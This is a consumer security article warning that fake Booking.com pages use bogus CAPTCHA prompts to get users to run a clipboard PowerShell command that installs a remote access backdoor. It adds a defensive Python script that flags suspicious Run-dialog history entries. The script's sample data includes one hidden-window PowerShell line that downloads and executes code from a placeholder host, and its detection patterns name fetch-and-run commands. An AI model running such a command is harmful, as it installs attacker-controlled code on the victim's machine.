Beware of Fake Websites Claiming to Be Booking.com

Scammers are targeting travelers planning their vacations in a new campaign that spoofs popular online travel agency (OTA) Booking.com. The scheme, discovered by Malwarebytes Labs, uses malicious CAPTCHA forms to gain remote access to victims’ devices, allowing the attackers to collect personal and financial information.

How Booking.com Scams Work

The campaign begins with links on social media and gaming sites, including sponsored ads, that redirect to sites posing as Booking.com, an OTA through which users can search for and book flights, hotels, car rentals and other travel services.

When users click on the link, they see a fake CAPTCHA pop-up with a checkbox that gives permission to copy the data to the clipboard. The next verification prompt asks you to execute the Run command on your device using a combination of keystrokes. (FYI: This is never a legitimate CAPTCHA request.)

In the background, the malicious CAPTCHA has copied a PowerShell command to your clipboard. If you follow the instructions, the command will download and execute a series of files that will install a Remote Access Tool (RAT) backdoor — identified as Backdoor.AsyncRAT — giving attackers the ability to remotely monitor and control your machine.
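For responders, commands typed into the Windows Run dialog are recorded in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), so that history can be reviewed for the pattern described above: a script host that quietly fetches and runs remote code. The sketch below is an added example, not code from the original article or from Malwarebytes Labs; the sample entries and indicator patterns are constructed assumptions, not a vendor detection rule.

```python
import re

# Indicator patterns are assumptions chosen for this example.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd(\.exe)?\s+/c)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "network_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|downloadstring)\b", re.I),
    "run_fetched_code": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url": re.compile(r"\bhttps?://", re.I),
}

def indicators(command):
    """Names of every indicator that matches the command, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))

def is_suspicious(command):
    """A script host plus concealment, or plus a fetch from a URL."""
    hits = set(indicators(command))
    if "script_host" not in hits:
        return False
    concealed = bool(hits & {"hidden_window", "encoded_command"})
    return concealed or {"network_fetch", "url"} <= hits

def triage(runmru):
    """Return (value_name, command, indicators) for flagged entries, newest first.

    `runmru` maps RunMRU value names to data; MRUList gives the order and
    each stored command ends with the two characters backslash + '1'.
    """
    flagged = []
    for name in runmru.get("MRUList", ""):
        command = runmru.get(name, "")
        if command.endswith("\\1"):
            command = command[:-2]
        if is_suspicious(command):
            flagged.append((name, command, indicators(command)))
    return flagged

# Constructed sample of exported RunMRU values (not taken from a real host).
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd /c ipconfig /all\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify)"\\1',
}

if __name__ == "__main__":
    for name, command, why in triage(SAMPLE_RUNMRU):
        print(f"[{name}] {command}\n    indicators: {', '.join(why)}")
```

A hit here only means the entry deserves a closer look; an empty result does not clear the machine, since the Run history can be edited or cleared.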

How to Detect and Avoid a RAT Attack on Booking.com

Check the URL

As Malwarebytes Labs notes, the domains and subdomains that scammers use to carry out this attack change frequently, and some appear more legitimate than others: (booking.)guestsalerts[.]com versus kvhandelregis[.]com, for example. To avoid falling victim to this and similar campaigns, don't click on links from ads or social media posts; instead, go directly to the site you want to visit.


Go to the site directly

Be aware that using a general Google search to plan travel can make you more susceptible to malicious advertising, as cybercriminals can spoof websites to look like popular services like Booking.com and display them at the top of sponsored results. You should type URLs directly into the address bar or book with the airline or hotel itself.

Be careful with CAPTCHA forms from untrusted sources

You should also be careful when following instructions from websites, CAPTCHA forms, or social media videos, such as instructions to run commands, which could easily lead you to install malware.

Finally, you can disable JavaScript in your browser, which will prevent access to the clipboard, although this will likely break other websites you visit.
